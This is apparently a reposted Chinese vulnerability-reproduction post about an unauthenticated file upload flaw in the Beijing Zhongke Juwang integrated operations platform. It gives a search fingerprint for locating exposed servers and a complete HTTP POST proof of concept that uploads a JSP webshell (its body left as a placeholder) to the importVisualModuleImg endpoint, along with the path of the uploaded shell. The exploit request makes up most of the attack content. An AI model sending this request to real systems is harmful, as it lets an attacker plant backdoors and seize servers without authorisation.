北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞

admin

139598
文章

114
评论

2024年7月31日15:19:19评论64 views字数 1083阅读3分36秒阅读模式

1漏洞描述

北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞，未经身份验证的攻击者可利用此漏洞上传后门文件，从而获取服务器权限。

2漏洞复现

首页

北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞

bp发包

北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞

链接地址：地址/files/visual/img/2/1.jsp

3网络测绘

body="thirdparty/ueditor/WordPaster"

4漏洞POC

POST /manage/tplresource/importVisualModuleImg?moduleId=2 HTTP/1.1
Host: 地址
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Length: 196
Cookie:  JSESSIONID=9438c497-92ad-4800-b821-20602adec4ac; rememberMe=dcOzuzCzFrtr02GhN9IwcsR9v759kvzO9wq/upEQ0jwsU5y/25kFW52CaKmZoRP7pwH979ifBBXB3b+li3PSXwZmxnh+bMgi6kv5vv8WNkNdy1pblj7sPxtwIm71auJPyyOl+aMKAhk/71leMQLpneRk/8f6USYL/acFuWhpjyuVU6oP6YJdIoCKGgdxAiUk; 

------9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: multipart/form-data

木马内容
------9979a3f1-cdb1-43af-af88-a9b48b67cf71--

原文始发于微信公众号（我吃饼干）：【漏洞复现】北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

北京中科聚网一体化运营平台存在importVisualModuleImg文件上传漏洞

【已复现】Craft CMS generate-transform 反序列化代码执行漏洞（CVE-2025-32432）

【成功复现】CrushFTP身份认证绕过漏洞（CVE-2025-2825)

宏景人力资源管理系统 searchCreatPlanList.do SQL注入漏洞(CNVD-2025-6953) POC

WordPress未授权任意文件读取_CVE-2025-2294 POC

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

DataEase H2 JDBC远程代码执行漏洞CVE-2025-32966

金盘移动图书馆系统信息泄露漏洞

Netgear信息泄露漏洞

JeeWMS cgAutoListController.do SQL注入漏洞

泛微E-Cology9前台SQL注入漏洞

发表评论

在线咨询

微信